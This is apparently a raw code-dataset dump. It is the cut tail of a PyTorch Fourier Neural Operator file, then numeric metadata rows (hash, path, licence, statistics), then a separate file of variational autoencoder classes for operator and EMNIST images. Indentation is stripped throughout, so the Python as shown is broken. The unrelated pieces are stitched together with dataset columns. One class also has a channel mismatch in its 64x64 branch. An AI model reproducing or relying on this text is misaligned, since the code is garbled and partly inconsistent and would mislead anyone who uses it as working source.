y = x[:,:,1].view(n_batch, n_grid, 1) # This is the x column
# print("INTERMEDIATE Y SHAPE", y.shape)
if self.ones_padding:
y = torch.cat([y, torch.ones_like(y)], axis=2)
# print("INTERMEDIATE Y SHAPE", y.shape)
for freq in self.freqs:
x_cos = torch.cos(freq * x[:,:,0].view(n_batch, n_grid, 1))
x_sin = torch.sin(freq * x[:,:,0].view(n_batch, n_grid, 1))
y = torch.cat([y, x_cos, x_sin], axis=2)
# print("INTERMEDIATE Y SHAPE", y.shape)
return y
class SinEncoder1dComplex(nn.Module):
def __init__(self, width):
super(SinEncoder1dComplex, self).__init__()
self.width = width
self.max_freq = int((self.width - 1) // 4)
self.ones_padding = self.width - self.max_freq * 4 - 1
self.freqs = torch.arange(self.max_freq)
LHS = 1 + 4 * self.max_freq + int(self.ones_padding)
assert LHS == self.width, "{} != {}".format(LHS, self.width)
def forward(self, x):
n_batch, n_grid, n_channels = x.shape
# channels are (Re(a(x)), Im(a(x)), x)
y_orig = x[:,:,2].view(n_batch, n_grid, 1) # This is the x column
y = y_orig
# print("INTERMEDIATE Y SHAPE", y.shape)
for i in range(self.ones_padding):
y = torch.cat([y, torch.ones_like(y_orig)], axis=2)
# print("INTERMEDIATE Y SHAPE", y.shape)
for freq in self.freqs:
x_real_cos = torch.cos(freq * x[:,:,0].view(n_batch, n_grid, 1))
x_real_sin = torch.sin(freq * x[:,:,0].view(n_batch, n_grid, 1))
x_imag_cos = torch.cos(freq * x[:,:,1].view(n_batch, n_grid, 1))
x_imag_sin = torch.sin(freq * x[:,:,1].view(n_batch, n_grid, 1))
y = torch.cat([y, x_real_cos, x_real_sin, x_imag_cos, x_imag_sin], axis=2)
# print("INTERMEDIATE Y SHAPE", y.shape)
return y
class SpectralEncodingFNO1dReal(nn.Module):
def __init__(self, modes, width):
super(SpectralEncodingFNO1dReal, self).__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desire channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the initial condition and location (a(x), x)
input shape: (batchsize, x=s, c=2)
output: the solution of a later timestep
output shape: (batchsize, x=s, c=1)
"""
self.modes1 = modes
self.width = width
# self.fc0 = nn.Linear(2, self.width) # input channel is 2: (a(x), x)
self.sin_encoder = SinEncoder1dReal(self.width)
self.conv0 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv1 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv2 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv3 = SpectralConv1d(self.width, self.width, self.modes1)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 1)
def forward(self, x):
# print("X", x.shape)
# x_fc0 = self.fc0(x)
# print("FC_0", x_fc0.shape)
x_sin = self.sin_encoder(x)
# print("X_SIN", x_sin.shape)
# exit(0)
x = x_sin.permute(0, 2, 1)
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
x = x.permute(0, 2, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return x.squeeze()
class SpectralEncodingFNO1dComplex(nn.Module):
def __init__(self, modes, width):
super(SpectralEncodingFNO1dComplex, self).__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desire channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the initial condition and location (a(x), x)
input shape: (batchsize, x=s, c=2)
output: the solution of a later timestep
output shape: (batchsize, x=s, c=1)
"""
self.modes1 = modes
self.width = width
# self.fc0 = nn.Linear(2, self.width) # input channel is 2: (Re(a(x)), Im(a(x)), x)
self.sin_encoder = SinEncoder1dComplex(self.width)
self.conv0 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv1 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv2 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv3 = SpectralConv1d(self.width, self.width, self.modes1)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 1)
def forward(self, x):
# print("X", x.shape)
# x_fc0 = self.fc0(x)
# print("FC_0", x_fc0.shape)
x_sin = self.sin_encoder(x)
# print("X_SIN", x_sin.shape)
# exit(0)
x = x_sin.permute(0, 2, 1)
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.relu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
x = x.permute(0, 2, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return x.squeeze()
class FNO1d(nn.Module):
def __init__(self, modes, width):
super(FNO1d, self).__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
1. Lift the input to the desire channel dimension by self.fc0 .
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the initial condition and location (a(x), x)
input shape: (batchsize, x=s, c=2)
output: the solution of a later timestep
output shape: (batchsize, x=s, c=1)
"""
self.modes1 = modes
self.width = width
self.padding = 2 # pad the domain if input is non-periodic
self.fc0 = nn.Linear(2, self.width) # input channel is 2: (a(x), x)
self.conv0 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv1 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv2 = SpectralConv1d(self.width, self.width, self.modes1)
self.conv3 = SpectralConv1d(self.width, self.width, self.modes1)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 1)
def forward(self, x):
grid = self.get_grid(x.shape, x.device)
x = torch.cat((x, grid), dim=-1)
x = self.fc0(x)
x = x.permute(0, 2, 1)
# x = F.pad(x, [0,self.padding]) # pad the domain if input is non-periodic
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.gelu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.gelu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.gelu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
# x = x[..., :-self.padding] # pad the domain if input is non-periodic
x = x.permute(0, 2, 1)
x = self.fc1(x)
x = F.gelu(x)
x = self.fc2(x)
return x
def get_grid(self, shape, device):
batchsize, size_x = shape[0], shape[1]
gridx = torch.tensor(np.linspace(0, 1, size_x), dtype=torch.float)
gridx = gridx.reshape(1, size_x, 1).repeat([batchsize, 1, 1])
return gridx.to(device)
| 34.074856
| 121
| 0.562215
| 2,669
| 17,753
| 3.671413
| 0.071937
| 0.117563
| 0.0995
| 0.088172
| 0.826513
| 0.808348
| 0.803347
| 0.791407
| 0.764874
| 0.747525
| 0
| 0.046986
| 0.301076
| 17,753
| 521
| 122
| 34.074856
| 0.742747
| 0.099927
| 0
| 0.767974
| 0
| 0
| 0.002274
| 0
| 0
| 0
| 0
| 0
| 0.006536
| 1
| 0.065359
| false
| 0
| 0.013072
| 0.003268
| 0.143791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58748fce3fda71edbb71668eafd0bbb1ce7e065b
| 28,323
|
py
|
Python
|
jointvae/models_custom.py
|
aashishkumar0228/joint-vae
|
6d0d5a19ddb8cb0a1bbe27ec8b8999cc1e177131
|
[
"MIT"
] | null | null | null |
jointvae/models_custom.py
|
aashishkumar0228/joint-vae
|
6d0d5a19ddb8cb0a1bbe27ec8b8999cc1e177131
|
[
"MIT"
] | null | null | null |
jointvae/models_custom.py
|
aashishkumar0228/joint-vae
|
6d0d5a19ddb8cb0a1bbe27ec8b8999cc1e177131
|
[
"MIT"
] | null | null | null |
import torch
from torch import nn, optim
from torch.nn import functional as F
EPS = 1e-12
class VAE_OPERATOR(nn.Module):
def __init__(self, img_size, latent_spec, temperature=.67, use_cuda=False, hidden_dim=64):
"""
Class which defines model and forward pass.
Parameters
----------
img_size : tuple of ints
Size of images. E.g. (1, 32, 32) or (3, 64, 64).
latent_spec : dict
Specifies latent distribution. For example:
{'cont': 10, 'disc': [10, 4, 3]} encodes 10 normal variables and
3 gumbel softmax variables of dimension 10, 4 and 3. A latent spec
can include both 'cont' and 'disc' or only 'cont' or only 'disc'.
temperature : float
Temperature for gumbel softmax distribution.
use_cuda : bool
If True moves model to GPU
"""
super(VAE_OPERATOR, self).__init__()
self.use_cuda = use_cuda
# Parameters
self.img_size = img_size
self.is_continuous = 'cont' in latent_spec
self.is_discrete = 'disc' in latent_spec
self.latent_spec = latent_spec
self.num_pixels = img_size[1] * img_size[2]
self.temperature = temperature
self.hidden_dim = hidden_dim # Hidden dimension of linear layer
self.reshape = (16, 4, 4) # Shape required to start transpose convs
# Calculate dimensions of latent distribution
self.latent_cont_dim = 0
self.latent_disc_dim = 0
self.num_disc_latents = 0
if self.is_continuous:
self.latent_cont_dim = self.latent_spec['cont']
if self.is_discrete:
self.latent_disc_dim += sum([dim for dim in self.latent_spec['disc']])
self.num_disc_latents = len(self.latent_spec['disc'])
self.latent_dim = self.latent_cont_dim + self.latent_disc_dim
# Define encoder layers
# Intial layer
encoder_layers = [
nn.Conv2d(self.img_size[0], 8, (4, 4), stride=2, padding=1),
nn.ReLU()
]
# Add additional layer if (64, 64) images
if self.img_size[1:] == (64, 64):
encoder_layers += [
nn.Conv2d(32, 32, (4, 4), stride=2, padding=1),
nn.ReLU()
]
elif self.img_size[1:] == (32, 32):
# (32, 32) images are supported but do not require an extra layer
pass
else:
raise RuntimeError("{} sized images not supported. Only (None, 32, 32) and (None, 64, 64) supported. Build your own architecture or reshape images!".format(img_size))
# Add final layers
encoder_layers += [
nn.Conv2d(8, 16, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 16, (4, 4), stride=2, padding=1),
nn.ReLU()
]
# Define encoder
self.img_to_features = nn.Sequential(*encoder_layers)
# Map encoded features into a hidden vector which will be used to
# encode parameters of the latent distribution
self.features_to_hidden = nn.Sequential(
nn.Linear(16 * 4 * 4, self.hidden_dim),
nn.ReLU()
)
# Encode parameters of latent distribution
if self.is_continuous:
self.fc_mean = nn.Linear(self.hidden_dim, self.latent_cont_dim)
self.fc_log_var = nn.Linear(self.hidden_dim, self.latent_cont_dim)
if self.is_discrete:
# Linear layer for each of the categorical distributions
fc_alphas = []
for disc_dim in self.latent_spec['disc']:
fc_alphas.append(nn.Linear(self.hidden_dim, disc_dim))
self.fc_alphas = nn.ModuleList(fc_alphas)
# Map latent samples to features to be used by generative model
self.latent_to_features = nn.Sequential(
nn.Linear(self.latent_dim, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, 16 * 4 * 4),
nn.ReLU()
)
# Define decoder
decoder_layers = []
# Additional decoding layer for (64, 64) images
if self.img_size[1:] == (64, 64):
decoder_layers += [
nn.ConvTranspose2d(64, 64, (4, 4), stride=2, padding=1),
nn.ReLU()
]
decoder_layers += [
nn.ConvTranspose2d(16, 8, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.ConvTranspose2d(8, 8, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.ConvTranspose2d(8, self.img_size[0], (4, 4), stride=2, padding=1),
nn.Sigmoid()
]
# Define decoder
self.features_to_img = nn.Sequential(*decoder_layers)
def encode(self, x):
"""
Encodes an image into parameters of a latent distribution defined in
self.latent_spec.
Parameters
----------
x : torch.Tensor
Batch of data, shape (N, C, H, W)
"""
batch_size = x.size()[0]
# Encode image to hidden features
features = self.img_to_features(x)
hidden = self.features_to_hidden(features.view(batch_size, -1))
# Output parameters of latent distribution from hidden representation
latent_dist = {}
if self.is_continuous:
latent_dist['cont'] = [self.fc_mean(hidden), self.fc_log_var(hidden)]
if self.is_discrete:
latent_dist['disc'] = []
for fc_alpha in self.fc_alphas:
latent_dist['disc'].append(F.softmax(fc_alpha(hidden), dim=1))
return latent_dist
def reparameterize(self, latent_dist):
"""
Samples from latent distribution using the reparameterization trick.
Parameters
----------
latent_dist : dict
Dict with keys 'cont' or 'disc' or both, containing the parameters
of the latent distributions as torch.Tensor instances.
"""
latent_sample = []
if self.is_continuous:
mean, logvar = latent_dist['cont']
cont_sample = self.sample_normal(mean, logvar)
latent_sample.append(cont_sample)
if self.is_discrete:
for alpha in latent_dist['disc']:
disc_sample = self.sample_gumbel_softmax(alpha)
latent_sample.append(disc_sample)
# Concatenate continuous and discrete samples into one large sample
return torch.cat(latent_sample, dim=1)
def sample_normal(self, mean, logvar):
"""
Samples from a normal distribution using the reparameterization trick.
Parameters
----------
mean : torch.Tensor
Mean of the normal distribution. Shape (N, D) where D is dimension
of distribution.
logvar : torch.Tensor
Diagonal log variance of the normal distribution. Shape (N, D)
"""
if self.training:
std = torch.exp(0.5 * logvar)
eps = torch.zeros(std.size()).normal_()
if self.use_cuda:
eps = eps.cuda()
return mean + std * eps
else:
# Reconstruction mode
return mean
def sample_gumbel_softmax(self, alpha):
"""
Samples from a gumbel-softmax distribution using the reparameterization
trick.
Parameters
----------
alpha : torch.Tensor
Parameters of the gumbel-softmax distribution. Shape (N, D)
"""
if self.training:
# Sample from gumbel distribution
unif = torch.rand(alpha.size())
if self.use_cuda:
unif = unif.cuda()
gumbel = -torch.log(-torch.log(unif + EPS) + EPS)
# Reparameterize to create gumbel softmax sample
log_alpha = torch.log(alpha + EPS)
logit = (log_alpha + gumbel) / self.temperature
return F.softmax(logit, dim=1)
else:
# In reconstruction mode, pick most likely sample
_, max_alpha = torch.max(alpha, dim=1)
one_hot_samples = torch.zeros(alpha.size())
# On axis 1 of one_hot_samples, scatter the value 1 at indices
# max_alpha. Note the view is because scatter_ only accepts 2D
# tensors.
one_hot_samples.scatter_(1, max_alpha.view(-1, 1).data.cpu(), 1)
if self.use_cuda:
one_hot_samples = one_hot_samples.cuda()
return one_hot_samples
def decode(self, latent_sample):
"""
Decodes sample from latent distribution into an image.
Parameters
----------
latent_sample : torch.Tensor
Sample from latent distribution. Shape (N, L) where L is dimension
of latent distribution.
"""
features = self.latent_to_features(latent_sample)
return self.features_to_img(features.view(-1, *self.reshape))
def forward(self, x):
"""
Forward pass of model.
Parameters
----------
x : torch.Tensor
Batch of data. Shape (N, C, H, W)
"""
latent_dist = self.encode(x)
latent_sample = self.reparameterize(latent_dist)
return self.decode(latent_sample), latent_dist
class VAE_EMNIST(nn.Module):
def __init__(self, img_size, latent_spec, temperature=.67, use_cuda=False, hidden_dim=256):
"""
Class which defines model and forward pass.
Parameters
----------
img_size : tuple of ints
Size of images. E.g. (1, 32, 32) or (3, 64, 64).
latent_spec : dict
Specifies latent distribution. For example:
{'cont': 10, 'disc': [10, 4, 3]} encodes 10 normal variables and
3 gumbel softmax variables of dimension 10, 4 and 3. A latent spec
can include both 'cont' and 'disc' or only 'cont' or only 'disc'.
temperature : float
Temperature for gumbel softmax distribution.
use_cuda : bool
If True moves model to GPU
"""
super(VAE_EMNIST, self).__init__()
self.use_cuda = use_cuda
# Parameters
self.img_size = img_size
self.is_continuous = 'cont' in latent_spec
self.is_discrete = 'disc' in latent_spec
self.latent_spec = latent_spec
self.num_pixels = img_size[1] * img_size[2]
self.temperature = temperature
self.hidden_dim = hidden_dim # Hidden dimension of linear layer
self.reshape = (64, 4, 4) # Shape required to start transpose convs
# Calculate dimensions of latent distribution
self.latent_cont_dim = 0
self.latent_disc_dim = 0
self.num_disc_latents = 0
if self.is_continuous:
self.latent_cont_dim = self.latent_spec['cont']
if self.is_discrete:
self.latent_disc_dim += sum([dim for dim in self.latent_spec['disc']])
self.num_disc_latents = len(self.latent_spec['disc'])
self.latent_dim = self.latent_cont_dim + self.latent_disc_dim
# Define encoder layers
# Intial layer
encoder_layers = [
nn.Conv2d(self.img_size[0], 32, (4, 4), stride=2, padding=1),
nn.ReLU()
]
# Add additional layer if (64, 64) images
if self.img_size[1:] == (64, 64):
encoder_layers += [
nn.Conv2d(32, 32, (4, 4), stride=2, padding=1),
nn.ReLU()
]
elif self.img_size[1:] == (32, 32):
# (32, 32) images are supported but do not require an extra layer
pass
else:
raise RuntimeError("{} sized images not supported. Only (None, 32, 32) and (None, 64, 64) supported. Build your own architecture or reshape images!".format(img_size))
# Add final layers
encoder_layers += [
nn.Conv2d(32, 64, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, (4, 4), stride=2, padding=1),
nn.ReLU()
]
# Define encoder
self.img_to_features = nn.Sequential(*encoder_layers)
# Map encoded features into a hidden vector which will be used to
# encode parameters of the latent distribution
self.features_to_hidden = nn.Sequential(
nn.Linear(64 * 4 * 4, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, self.hidden_dim),
nn.ReLU()
)
# Encode parameters of latent distribution
if self.is_continuous:
self.fc_mean = nn.Linear(self.hidden_dim, self.latent_cont_dim)
self.fc_log_var = nn.Linear(self.hidden_dim, self.latent_cont_dim)
if self.is_discrete:
# Linear layer for each of the categorical distributions
fc_alphas = []
for disc_dim in self.latent_spec['disc']:
fc_alphas.append(nn.Linear(self.hidden_dim, disc_dim))
self.fc_alphas = nn.ModuleList(fc_alphas)
# Map latent samples to features to be used by generative model
self.latent_to_features = nn.Sequential(
nn.Linear(self.latent_dim, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, 64 * 4 * 4),
nn.ReLU()
)
# Define decoder
decoder_layers = []
# Additional decoding layer for (64, 64) images
if self.img_size[1:] == (64, 64):
decoder_layers += [
nn.ConvTranspose2d(64, 64, (4, 4), stride=2, padding=1),
nn.ReLU()
]
decoder_layers += [
nn.ConvTranspose2d(64, 32, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.ConvTranspose2d(32, 32, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.ConvTranspose2d(32, self.img_size[0], (4, 4), stride=2, padding=1),
nn.Sigmoid()
]
# Define decoder
self.features_to_img = nn.Sequential(*decoder_layers)
def encode(self, x):
"""
Encodes an image into parameters of a latent distribution defined in
self.latent_spec.
Parameters
----------
x : torch.Tensor
Batch of data, shape (N, C, H, W)
"""
batch_size = x.size()[0]
# Encode image to hidden features
features = self.img_to_features(x)
hidden = self.features_to_hidden(features.view(batch_size, -1))
# Output parameters of latent distribution from hidden representation
latent_dist = {}
if self.is_continuous:
latent_dist['cont'] = [self.fc_mean(hidden), self.fc_log_var(hidden)]
if self.is_discrete:
latent_dist['disc'] = []
for fc_alpha in self.fc_alphas:
latent_dist['disc'].append(F.softmax(fc_alpha(hidden), dim=1))
return latent_dist
def reparameterize(self, latent_dist):
"""
Samples from latent distribution using the reparameterization trick.
Parameters
----------
latent_dist : dict
Dict with keys 'cont' or 'disc' or both, containing the parameters
of the latent distributions as torch.Tensor instances.
"""
latent_sample = []
if self.is_continuous:
mean, logvar = latent_dist['cont']
cont_sample = self.sample_normal(mean, logvar)
latent_sample.append(cont_sample)
if self.is_discrete:
for alpha in latent_dist['disc']:
disc_sample = self.sample_gumbel_softmax(alpha)
latent_sample.append(disc_sample)
# Concatenate continuous and discrete samples into one large sample
return torch.cat(latent_sample, dim=1)
def sample_normal(self, mean, logvar):
"""
Samples from a normal distribution using the reparameterization trick.
Parameters
----------
mean : torch.Tensor
Mean of the normal distribution. Shape (N, D) where D is dimension
of distribution.
logvar : torch.Tensor
Diagonal log variance of the normal distribution. Shape (N, D)
"""
if self.training:
std = torch.exp(0.5 * logvar)
eps = torch.zeros(std.size()).normal_()
if self.use_cuda:
eps = eps.cuda()
return mean + std * eps
else:
# Reconstruction mode
return mean
def sample_gumbel_softmax(self, alpha):
"""
Samples from a gumbel-softmax distribution using the reparameterization
trick.
Parameters
----------
alpha : torch.Tensor
Parameters of the gumbel-softmax distribution. Shape (N, D)
"""
if self.training:
# Sample from gumbel distribution
unif = torch.rand(alpha.size())
if self.use_cuda:
unif = unif.cuda()
gumbel = -torch.log(-torch.log(unif + EPS) + EPS)
# Reparameterize to create gumbel softmax sample
log_alpha = torch.log(alpha + EPS)
logit = (log_alpha + gumbel) / self.temperature
return F.softmax(logit, dim=1)
else:
# In reconstruction mode, pick most likely sample
_, max_alpha = torch.max(alpha, dim=1)
one_hot_samples = torch.zeros(alpha.size())
# On axis 1 of one_hot_samples, scatter the value 1 at indices
# max_alpha. Note the view is because scatter_ only accepts 2D
# tensors.
one_hot_samples.scatter_(1, max_alpha.view(-1, 1).data.cpu(), 1)
if self.use_cuda:
one_hot_samples = one_hot_samples.cuda()
return one_hot_samples
def decode(self, latent_sample):
"""
Decodes sample from latent distribution into an image.
Parameters
----------
latent_sample : torch.Tensor
Sample from latent distribution. Shape (N, L) where L is dimension
of latent distribution.
"""
features = self.latent_to_features(latent_sample)
return self.features_to_img(features.view(-1, *self.reshape))
def forward(self, x):
"""
Forward pass of model.
Parameters
----------
x : torch.Tensor
Batch of data. Shape (N, C, H, W)
"""
latent_dist = self.encode(x)
latent_sample = self.reparameterize(latent_dist)
return self.decode(latent_sample), latent_dist
class BTCVAE_EMNIST(nn.Module):
def __init__(self, img_size, latent_spec, temperature=.67, use_cuda=False, hidden_dim=256):
"""
Class which defines model and forward pass.
Parameters
----------
img_size : tuple of ints
Size of images. E.g. (1, 32, 32) or (3, 64, 64).
latent_spec : dict
Specifies latent distribution. For example:
{'cont': 10, 'disc': [10, 4, 3]} encodes 10 normal variables and
3 gumbel softmax variables of dimension 10, 4 and 3. A latent spec
can include both 'cont' and 'disc' or only 'cont' or only 'disc'.
temperature : float
Temperature for gumbel softmax distribution.
use_cuda : bool
If True moves model to GPU
"""
super(BTCVAE_EMNIST, self).__init__()
self.use_cuda = use_cuda
# Parameters
self.img_size = img_size
self.is_continuous = 'cont' in latent_spec
self.is_discrete = 'disc' in latent_spec
self.latent_spec = latent_spec
self.num_pixels = img_size[1] * img_size[2]
self.temperature = temperature
self.hidden_dim = hidden_dim # Hidden dimension of linear layer
self.reshape = (64, 4, 4) # Shape required to start transpose convs
# Calculate dimensions of latent distribution
self.latent_cont_dim = 0
self.latent_disc_dim = 0
self.num_disc_latents = 0
if self.is_continuous:
self.latent_cont_dim = self.latent_spec['cont']
if self.is_discrete:
self.latent_disc_dim += sum([dim for dim in self.latent_spec['disc']])
self.num_disc_latents = len(self.latent_spec['disc'])
self.latent_dim = self.latent_cont_dim + self.latent_disc_dim
# Define encoder layers
# Intial layer
encoder_layers = [
nn.Conv2d(self.img_size[0], 32, (4, 4), stride=2, padding=1),
nn.ReLU()
]
# Add additional layer if (64, 64) images
if self.img_size[1:] == (64, 64):
encoder_layers += [
nn.Conv2d(32, 32, (4, 4), stride=2, padding=1),
nn.ReLU()
]
elif self.img_size[1:] == (32, 32):
# (32, 32) images are supported but do not require an extra layer
pass
else:
raise RuntimeError("{} sized images not supported. Only (None, 32, 32) and (None, 64, 64) supported. Build your own architecture or reshape images!".format(img_size))
# Add final layers
encoder_layers += [
nn.Conv2d(32, 64, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, (4, 4), stride=2, padding=1),
nn.ReLU()
]
# Define encoder
self.img_to_features = nn.Sequential(*encoder_layers)
# Map encoded features into a hidden vector which will be used to
# encode parameters of the latent distribution
self.features_to_hidden = nn.Sequential(
nn.Linear(64 * 4 * 4, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, self.hidden_dim),
nn.ReLU()
)
# Encode parameters of latent distribution
if self.is_continuous:
self.fc_mean = nn.Linear(self.hidden_dim, self.latent_cont_dim)
self.fc_log_var = nn.Linear(self.hidden_dim, self.latent_cont_dim)
if self.is_discrete:
# Linear layer for each of the categorical distributions
fc_alphas = []
for disc_dim in self.latent_spec['disc']:
fc_alphas.append(nn.Linear(self.hidden_dim, disc_dim))
self.fc_alphas = nn.ModuleList(fc_alphas)
# Map latent samples to features to be used by generative model
self.latent_to_features = nn.Sequential(
nn.Linear(self.latent_dim, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, self.hidden_dim),
nn.ReLU(),
nn.Linear(self.hidden_dim, 64 * 4 * 4),
nn.ReLU()
)
# Define decoder
decoder_layers = []
# Additional decoding layer for (64, 64) images
if self.img_size[1:] == (64, 64):
decoder_layers += [
nn.ConvTranspose2d(64, 64, (4, 4), stride=2, padding=1),
nn.ReLU()
]
decoder_layers += [
nn.ConvTranspose2d(64, 32, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.ConvTranspose2d(32, 32, (4, 4), stride=2, padding=1),
nn.ReLU(),
nn.ConvTranspose2d(32, self.img_size[0], (4, 4), stride=2, padding=1),
nn.Sigmoid()
]
# Define decoder
self.features_to_img = nn.Sequential(*decoder_layers)
def encode(self, x):
"""
Encodes an image into parameters of a latent distribution defined in
self.latent_spec.
Parameters
----------
x : torch.Tensor
Batch of data, shape (N, C, H, W)
"""
batch_size = x.size()[0]
# Encode image to hidden features
features = self.img_to_features(x)
hidden = self.features_to_hidden(features.view(batch_size, -1))
# Output parameters of latent distribution from hidden representation
latent_dist = {}
if self.is_continuous:
latent_dist['cont'] = [self.fc_mean(hidden), self.fc_log_var(hidden)]
if self.is_discrete:
latent_dist['disc'] = []
for fc_alpha in self.fc_alphas:
latent_dist['disc'].append(F.softmax(fc_alpha(hidden), dim=1))
return latent_dist
def reparameterize(self, latent_dist):
"""
Samples from latent distribution using the reparameterization trick.
Parameters
----------
latent_dist : dict
Dict with keys 'cont' or 'disc' or both, containing the parameters
of the latent distributions as torch.Tensor instances.
"""
latent_sample = []
self.latent_cont_sample = None
if self.is_continuous:
mean, logvar = latent_dist['cont']
cont_sample = self.sample_normal(mean, logvar)
self.latent_cont_sample = cont_sample
latent_sample.append(cont_sample)
if self.is_discrete:
for alpha in latent_dist['disc']:
disc_sample = self.sample_gumbel_softmax(alpha)
latent_sample.append(disc_sample)
# Concatenate continuous and discrete samples into one large sample
return torch.cat(latent_sample, dim=1)
def sample_normal(self, mean, logvar):
"""
Samples from a normal distribution using the reparameterization trick.
Parameters
----------
mean : torch.Tensor
Mean of the normal distribution. Shape (N, D) where D is dimension
of distribution.
logvar : torch.Tensor
Diagonal log variance of the normal distribution. Shape (N, D)
"""
if self.training:
std = torch.exp(0.5 * logvar)
eps = torch.zeros(std.size()).normal_()
if self.use_cuda:
eps = eps.cuda()
return mean + std * eps
else:
# Reconstruction mode
return mean
def sample_gumbel_softmax(self, alpha):
"""
Samples from a gumbel-softmax distribution using the reparameterization
trick.
Parameters
----------
alpha : torch.Tensor
Parameters of the gumbel-softmax distribution. Shape (N, D)
"""
if self.training:
# Sample from gumbel distribution
unif = torch.rand(alpha.size())
if self.use_cuda:
unif = unif.cuda()
gumbel = -torch.log(-torch.log(unif + EPS) + EPS)
# Reparameterize to create gumbel softmax sample
log_alpha = torch.log(alpha + EPS)
logit = (log_alpha + gumbel) / self.temperature
return F.softmax(logit, dim=1)
else:
# In reconstruction mode, pick most likely sample
_, max_alpha = torch.max(alpha, dim=1)
one_hot_samples = torch.zeros(alpha.size())
# On axis 1 of one_hot_samples, scatter the value 1 at indices
# max_alpha. Note the view is because scatter_ only accepts 2D
# tensors.
one_hot_samples.scatter_(1, max_alpha.view(-1, 1).data.cpu(), 1)
if self.use_cuda:
one_hot_samples = one_hot_samples.cuda()
return one_hot_samples
def decode(self, latent_sample):
"""
Decodes sample from latent distribution into an image.
Parameters
----------
latent_sample : torch.Tensor
Sample from latent distribution. Shape (N, L) where L is dimension
of latent distribution.
"""
features = self.latent_to_features(latent_sample)
return self.features_to_img(features.view(-1, *self.reshape))
def forward(self, x):
"""
Forward pass of model.
Parameters
----------
x : torch.Tensor
Batch of data. Shape (N, C, H, W)
"""
latent_dist = self.encode(x)
latent_sample = self.reparameterize(latent_dist)
return self.decode(latent_sample), latent_dist
| 35.806574
| 178
| 0.573033
| 3,458
| 28,323
| 4.537883
| 0.064777
| 0.039511
| 0.024025
| 0.013765
| 0.988784
| 0.988784
| 0.988784
| 0.988657
| 0.988657
| 0.988338
| 0
| 0.025963
| 0.328214
| 28,323
| 790
| 179
| 35.851899
| 0.79876
| 0.299015
| 0
| 0.892768
| 0
| 0.007481
| 0.028139
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052369
| false
| 0.007481
| 0.007481
| 0
| 0.127182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
